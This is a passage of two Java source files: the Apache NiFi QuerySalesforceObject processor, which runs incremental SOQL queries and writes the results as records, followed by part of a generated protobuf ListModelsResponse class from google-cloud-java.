org.apache.nifi.serialization.record.Record; import org.apache.nifi.serialization.record.RecordField; import org.apache.nifi.serialization.record.RecordFieldType; import org.apache.nifi.serialization.record.RecordSchema; import org.apache.nifi.util.StringUtils; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.io.UncheckedIOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import java.util.concurrent.atomic.AtomicReference; import java.util.function.BiPredicate; import java.util.stream.Collectors; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.API_VERSION; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.READ_TIMEOUT; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.SALESFORCE_INSTANCE_URL; import static org.apache.nifi.processors.salesforce.util.CommonSalesforceProperties.TOKEN_PROVIDER; @TriggerSerially @InputRequirement(Requirement.INPUT_ALLOWED) @Tags({"salesforce", "sobject", "soql", "query"}) @CapabilityDescription("Retrieves records from a Salesforce sObject. Users can add arbitrary filter conditions by setting the 'Custom WHERE Condition' property." + " The processor can also run a custom query, although record processing is not supported in that case." + " Supports incremental retrieval: users can define a field in the 'Age Field' property that will be used to determine when the record was created." + " When this property is set the processor will retrieve new records. Incremental loading and record-based processing are only supported in property-based queries." 
+ " It's also possible to define an initial cutoff value for the age, filtering out all older records" + " even for the first run. In case of 'Property Based Query' this processor should run on the Primary Node only." + " FlowFile attribute 'record.count' indicates how many records were retrieved and written to the output." + " The processor can accept an optional input FlowFile and reference the FlowFile attributes in the query." + " When 'Include Deleted Records' is true, the processor will include deleted records (soft-deletes) in the results by using the 'queryAll' API." + " The 'IsDeleted' field will be automatically included in the results when querying deleted records.") @Stateful(scopes = Scope.CLUSTER, description = "When 'Age Field' is set, after performing a query the time of execution is stored. Subsequent queries will be augmented" + " with an additional condition so that only records that are newer than the stored execution time (adjusted with the optional value of 'Age Delay') will be retrieved." 
+ " State is stored across the cluster so that this Processor can be run on Primary Node only and if a new Primary Node is selected," + " the new node can pick up where the previous node left off, without duplicating the data.") @WritesAttributes({ @WritesAttribute(attribute = "mime.type", description = "Sets the mime.type attribute to the MIME Type specified by the Record Writer."), @WritesAttribute(attribute = "record.count", description = "Sets the number of records in the FlowFile."), @WritesAttribute(attribute = "total.record.count", description = "Sets the total number of records in the FlowFile.") }) @DefaultSchedule(strategy = SchedulingStrategy.TIMER_DRIVEN, period = "1 min") @SeeAlso(PutSalesforceObject.class) public class QuerySalesforceObject extends AbstractProcessor { static final AllowableValue PROPERTY_BASED_QUERY = new AllowableValue("property-based-query", "Property Based Query", "Provide query by properties."); static final AllowableValue CUSTOM_QUERY = new AllowableValue("custom-query", "Custom Query", "Provide custom SOQL query."); static final PropertyDescriptor QUERY_TYPE = new PropertyDescriptor.Builder() .name("query-type") .displayName("Query Type") .description("Choose to provide the query by parameters or a full custom query.") .required(true) .defaultValue(PROPERTY_BASED_QUERY.getValue()) .allowableValues(PROPERTY_BASED_QUERY, CUSTOM_QUERY) .build(); static final PropertyDescriptor CUSTOM_SOQL_QUERY = new PropertyDescriptor.Builder() .name("custom-soql-query") .displayName("Custom SOQL Query") .description("Specify the SOQL query to run.") .required(true) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, CUSTOM_QUERY) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .build(); static final PropertyDescriptor SOBJECT_NAME = new PropertyDescriptor.Builder() .name("sobject-name") .displayName("sObject Name") .description("The Salesforce sObject to be queried") .required(true) 
.expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor FIELD_NAMES = new PropertyDescriptor.Builder() .name("field-names") .displayName("Field Names") .description("Comma-separated list of field names requested from the sObject to be queried. When this field is left empty, all fields are queried.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor RECORD_WRITER = new PropertyDescriptor.Builder() .name("record-writer") .displayName("Record Writer") .description("Service used for writing records returned from the Salesforce REST API") .identifiesControllerService(RecordSetWriterFactory.class) .required(true) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor CREATE_ZERO_RECORD_FILES = new PropertyDescriptor.Builder() .name("create-zero-record-files") .displayName("Create Zero Record FlowFiles") .description("Specifies whether or not to create a FlowFile when the Salesforce REST API does not return any records") .expressionLanguageSupported(ExpressionLanguageScope.NONE) .allowableValues("true", "false") .defaultValue("false") .required(true) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor AGE_FIELD = new PropertyDescriptor.Builder() .name("age-field") .displayName("Age Field") .description("The name of a TIMESTAMP field that will be used to filter records using a bounded time window." + "The processor will return only those records with a timestamp value newer than the timestamp recorded after the last processor run." 
) .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor AGE_DELAY = new PropertyDescriptor.Builder() .name("age-delay") .displayName("Age Delay") .description("The ending timestamp of the time window will be adjusted earlier by the amount configured in this property." + " For example, with a property value of 10 seconds, an ending timestamp of 12:30:45 would be changed to 12:30:35.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.TIME_PERIOD_VALIDATOR) .dependsOn(AGE_FIELD) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); public static final PropertyDescriptor INITIAL_AGE_FILTER = new PropertyDescriptor.Builder() .name("initial-age-filter") .displayName("Initial Age Start Time") .description("This property specifies the start time that the processor applies when running the first query.") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.ENVIRONMENT) .addValidator(StandardValidators.NON_BLANK_VALIDATOR) .dependsOn(AGE_FIELD) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor CUSTOM_WHERE_CONDITION = new PropertyDescriptor.Builder() .name("custom-where-condition") .displayName("Custom WHERE Condition") .description("A custom expression to be added in the WHERE clause of the query") .required(false) .expressionLanguageSupported(ExpressionLanguageScope.FLOWFILE_ATTRIBUTES) .addValidator(StandardValidators.NON_EMPTY_VALIDATOR) .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final PropertyDescriptor INCLUDE_DELETED_RECORDS = new PropertyDescriptor.Builder() .name("include-deleted-records") .displayName("Include Deleted Records") .description("If true, the processor will include deleted records (IsDeleted = true) in the query results. 
When enabled, the processor will use the 'queryAll' API.") .required(true) .defaultValue("false") .allowableValues("true", "false") .dependsOn(QUERY_TYPE, PROPERTY_BASED_QUERY) .build(); static final Relationship REL_SUCCESS = new Relationship.Builder() .name("success") .description("For FlowFiles created as a result of a successful query.") .build(); static final Relationship REL_ORIGINAL = new Relationship.Builder() .name("original") .description("The input flowfile gets sent to this relationship when the query succeeds.") .autoTerminateDefault(true) .build(); static final Relationship REL_FAILURE = new Relationship.Builder() .name("failure") .description("The input flowfile gets sent to this relationship when the query fails.") .autoTerminateDefault(true) .build(); public static final String LAST_AGE_FILTER = "last_age_filter"; private static final String STARTING_FIELD_NAME = "records"; private static final String DATE_FORMAT = "yyyy-MM-dd"; private static final String TIME_FORMAT = "HH:mm:ss.SSSZ"; private static final String DATE_TIME_FORMAT = "yyyy-MM-dd'T'HH:mm:ss.SSSZ"; private static final String NEXT_RECORDS_URL = "nextRecordsUrl"; private static final String TOTAL_SIZE = "totalSize"; private static final String RECORDS = "records"; private static final BiPredicate<String, String> CAPTURE_PREDICATE = (fieldName, fieldValue) -> NEXT_RECORDS_URL.equals(fieldName); private static final ObjectMapper OBJECT_MAPPER = new ObjectMapper(); private static final JsonFactory JSON_FACTORY = OBJECT_MAPPER.getFactory(); private static final String TOTAL_RECORD_COUNT_ATTRIBUTE = "total.record.count"; private static final int MAX_RECORD_COUNT = 2000; private static final JsonParserFactory jsonParserFactory = new JsonParserFactory(); private volatile SalesforceToRecordSchemaConverter salesForceToRecordSchemaConverter; private volatile SalesforceRestClient salesforceRestService; private volatile boolean resetState = false; @OnScheduled public void 
onScheduled(ProcessContext context) { if (resetState) { clearState(context); resetState = false; } salesForceToRecordSchemaConverter = new SalesforceToRecordSchemaConverter( DATE_FORMAT, DATE_TIME_FORMAT, TIME_FORMAT ); String salesforceVersion = context.getProperty(API_VERSION).getValue(); String instanceUrl = context.getProperty(SALESFORCE_INSTANCE_URL).getValue(); OAuth2AccessTokenProvider accessTokenProvider = context.getProperty(TOKEN_PROVIDER).asControllerService(OAuth2AccessTokenProvider.class); SalesforceConfiguration salesforceConfiguration = SalesforceConfiguration.create( instanceUrl, salesforceVersion, () -> accessTokenProvider.getAccessDetails().getAccessToken(), context.getProperty(READ_TIMEOUT).evaluateAttributeExpressions().asTimePeriod(TimeUnit.MILLISECONDS).intValue() ); salesforceRestService = new SalesforceRestClient(salesforceConfiguration); } private static final List<PropertyDescriptor> PROPERTY_DESCRIPTORS = List.of( SALESFORCE_INSTANCE_URL, API_VERSION, QUERY_TYPE, CUSTOM_SOQL_QUERY, SOBJECT_NAME, FIELD_NAMES, RECORD_WRITER, AGE_FIELD, INITIAL_AGE_FILTER, AGE_DELAY, CUSTOM_WHERE_CONDITION, INCLUDE_DELETED_RECORDS, READ_TIMEOUT, CREATE_ZERO_RECORD_FILES, TOKEN_PROVIDER ); private static final Set<Relationship> RELATIONSHIPS = Set.of( REL_SUCCESS, REL_FAILURE, REL_ORIGINAL ); @Override protected List<PropertyDescriptor> getSupportedPropertyDescriptors() { return PROPERTY_DESCRIPTORS; } @Override public Set<Relationship> getRelationships() { return RELATIONSHIPS; } @Override protected Collection<ValidationResult> customValidate(ValidationContext validationContext) { List<ValidationResult> results = new ArrayList<>(super.customValidate(validationContext)); return SalesforceAgeValidator.validate(validationContext, results); } @Override public void onPropertyModified(PropertyDescriptor descriptor, String oldValue, String newValue) { if ((oldValue != null && !oldValue.equals(newValue)) && (descriptor.equals(SALESFORCE_INSTANCE_URL) || 
descriptor.equals(QUERY_TYPE) || descriptor.equals(SOBJECT_NAME) || descriptor.equals(AGE_FIELD) || descriptor.equals(INITIAL_AGE_FILTER) || descriptor.equals(CUSTOM_WHERE_CONDITION) || descriptor.equals(INCLUDE_DELETED_RECORDS)) ) { getLogger().debug("A property that require resetting state was modified - {} oldValue {} newValue {}", descriptor.getDisplayName(), oldValue, newValue); resetState = true; } } @Override public void onTrigger(ProcessContext context, ProcessSession session) throws ProcessException { boolean isCustomQuery = CUSTOM_QUERY.getValue().equals(context.getProperty(QUERY_TYPE).getValue()); FlowFile flowFile = session.get(); if (isCustomQuery) { processCustomQuery(context, session, flowFile); } else { processQuery(context, session, flowFile); } } private void processQuery(ProcessContext context, ProcessSession session, FlowFile originalFlowFile) { AtomicReference<String> nextRecordsUrl = new AtomicReference<>(); String sObject = context.getProperty(SOBJECT_NAME).getValue(); String fields = context.getProperty(FIELD_NAMES).getValue(); String customWhereClause = context.getProperty(CUSTOM_WHERE_CONDITION).evaluateAttributeExpressions(originalFlowFile).getValue(); RecordSetWriterFactory writerFactory = context.getProperty(RECORD_WRITER).asControllerService(RecordSetWriterFactory.class); boolean createZeroRecordFlowFiles = context.getProperty(CREATE_ZERO_RECORD_FILES).asBoolean(); boolean includeDeletedRecords = context.getProperty(INCLUDE_DELETED_RECORDS).asBoolean(); StateMap state = getState(session); IncrementalContext incrementalContext = new IncrementalContext(context, state); SalesforceSchemaHolder salesForceSchemaHolder = getConvertedSalesforceSchema(sObject, fields, includeDeletedRecords); if (StringUtils.isBlank(fields)) { fields = salesForceSchemaHolder.getSalesforceObject().getFields() .stream() .map(SObjectField::getName) .collect(Collectors.joining(",")); } // Add IsDeleted to fields if Include Deleted Records is true if 
(includeDeletedRecords) { List<String> fieldList = Arrays.stream(fields.split("\\s*,\\s*")).collect(Collectors.toList()); if (fieldList.stream().noneMatch(f -> f.equalsIgnoreCase("IsDeleted"))) { fields = fields + ", IsDeleted"; } } String querySObject = new SalesforceQueryBuilder(incrementalContext) .buildQuery(sObject, fields, customWhereClause); AtomicBoolean isOriginalTransferred = new AtomicBoolean(false); List<FlowFile> outgoingFlowFiles = new ArrayList<>(); Map<String, String> originalAttributes = Optional.ofNullable(originalFlowFile) .map(FlowFile::getAttributes) .orElseGet(HashMap::new); long startNanos = System.nanoTime(); do { FlowFile outgoingFlowFile = createOutgoingFlowFile(session, originalFlowFile); outgoingFlowFiles.add(outgoingFlowFile); Map<String, String> attributes = new HashMap<>(originalAttributes); AtomicInteger recordCountHolder = new AtomicInteger(); try { outgoingFlowFile = session.write(outgoingFlowFile, processRecordsCallback(session, nextRecordsUrl, writerFactory, state, incrementalContext, salesForceSchemaHolder, querySObject, originalAttributes, attributes, recordCountHolder, includeDeletedRecords)); int recordCount = recordCountHolder.get(); if (createZeroRecordFlowFiles || recordCount != 0) { outgoingFlowFile = session.putAllAttributes(outgoingFlowFile, attributes); session.adjustCounter("Records Processed", recordCount, false); getLogger().info("Successfully written {} records for {}", recordCount, outgoingFlowFile); } else { outgoingFlowFiles.remove(outgoingFlowFile); session.remove(outgoingFlowFile); } } catch (Exception e) { if (e.getCause() instanceof IOException) { throw new ProcessException("Couldn't get Salesforce records", e); } else if (e.getCause() instanceof SchemaNotFoundException) { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't create record writer"); } else if (e.getCause() instanceof MalformedRecordException) { handleError(session, originalFlowFile, 
isOriginalTransferred, outgoingFlowFiles, e, "Couldn't read records from input"); } else { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't get Salesforce records"); } break; } } while (nextRecordsUrl.get() != null); transferFlowFiles(session, outgoingFlowFiles, originalFlowFile, isOriginalTransferred, startNanos, sObject); } private OutputStreamCallback processRecordsCallback(ProcessSession session, AtomicReference<String> nextRecordsUrl, RecordSetWriterFactory writerFactory, StateMap state, IncrementalContext incrementalContext, SalesforceSchemaHolder salesForceSchemaHolder, String querySObject, Map<String, String> originalAttributes, Map<String, String> attributes, AtomicInteger recordCountHolder, boolean includeDeletedRecords) { return out -> { try { handleRecordSet(out, nextRecordsUrl, querySObject, writerFactory, salesForceSchemaHolder, originalAttributes, attributes, recordCountHolder, includeDeletedRecords); if (incrementalContext.getAgeFilterUpper() != null) { Map<String, String> newState = new HashMap<>(state.toMap()); newState.put(LAST_AGE_FILTER, incrementalContext.getAgeFilterUpper()); updateState(session, newState); } } catch (Exception e) { throw new RuntimeException(e); } }; } private void handleRecordSet(OutputStream out, AtomicReference<String> nextRecordsUrl, String querySObject, RecordSetWriterFactory writerFactory, SalesforceSchemaHolder salesForceSchemaHolder, Map<String, String> originalAttributes, Map<String, String> attributes, AtomicInteger recordCountHolder, boolean includeDeletedRecords) throws Exception { try ( InputStream querySObjectResultInputStream = getResultInputStream(nextRecordsUrl.get(), querySObject, includeDeletedRecords); JsonTreeRowRecordReader jsonReader = createJsonReader(querySObjectResultInputStream, salesForceSchemaHolder.getRecordSchema()); RecordSetWriter writer = createRecordSetWriter(writerFactory, originalAttributes, out, salesForceSchemaHolder.getRecordSchema()) ) { 
writer.beginRecordSet(); Record querySObjectRecord; while ((querySObjectRecord = jsonReader.nextRecord()) != null) { writer.write(querySObjectRecord); } WriteResult writeResult = writer.finishRecordSet(); Map<String, String> capturedFields = jsonReader.getCapturedFields(); nextRecordsUrl.set(capturedFields.getOrDefault(NEXT_RECORDS_URL, null)); attributes.put("record.count", String.valueOf(writeResult.getRecordCount())); attributes.put(CoreAttributes.MIME_TYPE.key(), writer.getMimeType()); attributes.putAll(writeResult.getAttributes()); recordCountHolder.set(writeResult.getRecordCount()); } } private JsonTreeRowRecordReader createJsonReader(InputStream querySObjectResultInputStream, RecordSchema recordSchema) throws IOException, MalformedRecordException { return new JsonTreeRowRecordReader( querySObjectResultInputStream, getLogger(), recordSchema, DATE_FORMAT, TIME_FORMAT, DATE_TIME_FORMAT, StartingFieldStrategy.NESTED_FIELD, STARTING_FIELD_NAME, SchemaApplicationStrategy.SELECTED_PART, CAPTURE_PREDICATE, jsonParserFactory ); } private RecordSetWriter createRecordSetWriter(RecordSetWriterFactory writerFactory, Map<String, String> originalAttributes, OutputStream out, RecordSchema recordSchema) throws IOException, SchemaNotFoundException { return writerFactory.createWriter( getLogger(), writerFactory.getSchema( originalAttributes, recordSchema ), out, originalAttributes ); } private void processCustomQuery(ProcessContext context, ProcessSession session, FlowFile originalFlowFile) { String customQuery = context.getProperty(CUSTOM_SOQL_QUERY).evaluateAttributeExpressions(originalFlowFile).getValue(); AtomicReference<String> nextRecordsUrl = new AtomicReference<>(); AtomicReference<String> totalSize = new AtomicReference<>(); AtomicBoolean isOriginalTransferred = new AtomicBoolean(false); List<FlowFile> outgoingFlowFiles = new ArrayList<>(); long startNanos = System.nanoTime(); boolean includeDeletedRecords = context.getProperty(INCLUDE_DELETED_RECORDS).asBoolean(); do 
{ try (InputStream response = getResultInputStream(nextRecordsUrl.get(), customQuery, includeDeletedRecords)) { FlowFile outgoingFlowFile = createOutgoingFlowFile(session, originalFlowFile); outgoingFlowFiles.add(outgoingFlowFile); outgoingFlowFile = session.write(outgoingFlowFile, parseCustomQueryResponse(response, nextRecordsUrl, totalSize)); int recordCount = nextRecordsUrl.get() != null ? MAX_RECORD_COUNT : Integer.parseInt(totalSize.get()) % MAX_RECORD_COUNT; Map<String, String> attributes = new HashMap<>(); attributes.put(CoreAttributes.MIME_TYPE.key(), "application/json"); attributes.put(TOTAL_RECORD_COUNT_ATTRIBUTE, String.valueOf(recordCount)); session.adjustCounter("Salesforce records processed", recordCount, false); outgoingFlowFile = session.putAllAttributes(outgoingFlowFile, attributes); } catch (IOException e) { throw new ProcessException("Couldn't get Salesforce records", e); } catch (Exception e) { handleError(session, originalFlowFile, isOriginalTransferred, outgoingFlowFiles, e, "Couldn't get Salesforce records"); break; } } while (nextRecordsUrl.get() != null); transferFlowFiles(session, outgoingFlowFiles, originalFlowFile, isOriginalTransferred, startNanos, "custom"); } private void transferFlowFiles(ProcessSession session, List<FlowFile> outgoingFlowFiles, FlowFile originalFlowFile, AtomicBoolean isOriginalTransferred, long startNanos, String urlDetail) { if (!outgoingFlowFiles.isEmpty()) { session.transfer(outgoingFlowFiles, REL_SUCCESS); long transferMillis = TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - startNanos); outgoingFlowFiles.forEach(ff -> session.getProvenanceReporter().receive(ff, salesforceRestService.getVersionedBaseUrl() + "/" + urlDetail, transferMillis) ); } if (originalFlowFile != null && !isOriginalTransferred.get()) { session.transfer(originalFlowFile, REL_ORIGINAL); } } private FlowFile createOutgoingFlowFile(ProcessSession session, FlowFile originalFlowFile) { if (originalFlowFile != null) { return 
session.create(originalFlowFile); } else { return session.create(); } } private OutputStreamCallback parseCustomQueryResponse(InputStream in, AtomicReference<String> nextRecordsUrl, AtomicReference<String> totalSize) { nextRecordsUrl.set(null); return out -> { try (JsonParser jsonParser = JSON_FACTORY.createParser(in); JsonGenerator jsonGenerator = JSON_FACTORY.createGenerator(out, JsonEncoding.UTF8)) { while (jsonParser.nextToken() != null) { if (nextTokenIs(jsonParser, TOTAL_SIZE)) { totalSize.set(jsonParser.getValueAsString()); } else if (nextTokenIs(jsonParser, NEXT_RECORDS_URL)) { nextRecordsUrl.set(jsonParser.getValueAsString()); } else if (nextTokenIs(jsonParser, RECORDS)) { jsonGenerator.copyCurrentStructure(jsonParser); } } } }; } private boolean nextTokenIs(JsonParser jsonParser, String value) throws IOException { return jsonParser.getCurrentToken() == JsonToken.FIELD_NAME && jsonParser.currentName() .equals(value) && jsonParser.nextToken() != null; } private InputStream getResultInputStream(String nextRecordsUrl, String querySObject, boolean includeDeletedRecords) { if (nextRecordsUrl == null) { if (includeDeletedRecords) { return salesforceRestService.queryAll(querySObject); } else { return salesforceRestService.query(querySObject); } } return salesforceRestService.getNextRecords(nextRecordsUrl); } private SalesforceSchemaHolder getConvertedSalesforceSchema(String sObject, String fields, boolean includeDeletedRecords) { try (InputStream describeSObjectResult = salesforceRestService.describeSObject(sObject)) { return convertSchema(describeSObjectResult, fields); } catch (IOException e) { throw new UncheckedIOException("Salesforce input stream close failed", e); } } private void handleError(ProcessSession session, FlowFile originalFlowFile, AtomicBoolean isOriginalTransferred, List<FlowFile> outgoingFlowFiles, Exception e, String errorMessage) { if (originalFlowFile != null) { session.transfer(originalFlowFile, REL_FAILURE); 
isOriginalTransferred.set(true); } getLogger().error(errorMessage, e); session.remove(outgoingFlowFiles); outgoingFlowFiles.clear(); } private StateMap getState(ProcessSession session) { StateMap state; try { state = session.getState(Scope.CLUSTER); } catch (IOException e) { throw new ProcessException("State retrieval failed", e); } return state; } private void updateState(ProcessSession session, Map<String, String> newState) { try { session.setState(newState, Scope.CLUSTER); } catch (IOException e) { throw new ProcessException("Last Age Filter state update failed", e); } } private void clearState(ProcessContext context) { try { getLogger().debug("Clearing state based on property modifications"); context.getStateManager().clear(Scope.CLUSTER); } catch (final IOException e) { getLogger().warn("Failed to clear state", e); } } protected SalesforceSchemaHolder convertSchema(InputStream describeSObjectResult, String fieldsOfInterest) { try { SObjectDescription salesforceObject = salesForceToRecordSchemaConverter.getSalesforceObject(describeSObjectResult); RecordSchema recordSchema = salesForceToRecordSchemaConverter.convertSchema(salesforceObject, fieldsOfInterest); RecordSchema querySObjectResultSchema = new SimpleRecordSchema(Collections.singletonList( new RecordField(STARTING_FIELD_NAME, RecordFieldType.ARRAY.getArrayDataType( RecordFieldType.RECORD.getRecordDataType(recordSchema) )) )); return new SalesforceSchemaHolder(querySObjectResultSchema, recordSchema, salesforceObject); } catch (IOException e) { throw new ProcessException("SObject to Record schema conversion failed", e); } } }
googleapis/google-cloud-java
35,728
java-aiplatform/proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ListModelsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/model_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message for * [ModelService.ListModels][google.cloud.aiplatform.v1.ModelService.ListModels] * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListModelsResponse} */ public final class ListModelsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ListModelsResponse) ListModelsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListModelsResponse.newBuilder() to construct. 
private ListModelsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListModelsResponse() { models_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListModelsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.ModelServiceProto .internal_static_google_cloud_aiplatform_v1_ListModelsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListModelsResponse.class, com.google.cloud.aiplatform.v1.ListModelsResponse.Builder.class); } public static final int MODELS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1.Model> models_; /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1.Model> getModelsList() { return models_; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1.ModelOrBuilder> getModelsOrBuilderList() { return models_; } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public int getModelsCount() { return models_.size(); } /** * * * <pre> * List of Models in the requested page. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.Model getModels(int index) { return models_.get(index); } /** * * * <pre> * List of Models in the requested page. * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Model models = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.ModelOrBuilder getModelsOrBuilder(int index) { return models_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * A token to retrieve next page of results. * Pass to * [ListModelsRequest.page_token][google.cloud.aiplatform.v1.ListModelsRequest.page_token] * to obtain that page. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < models_.size(); i++) { output.writeMessage(1, models_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < models_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, models_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ListModelsResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ListModelsResponse other = (com.google.cloud.aiplatform.v1.ListModelsResponse) obj; if (!getModelsList().equals(other.getModelsList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if 
(!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getModelsCount() > 0) { hash = (37 * hash) + MODELS_FIELD_NUMBER; hash = (53 * hash) + getModelsList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListModelsResponse parseFrom( byte[] data, 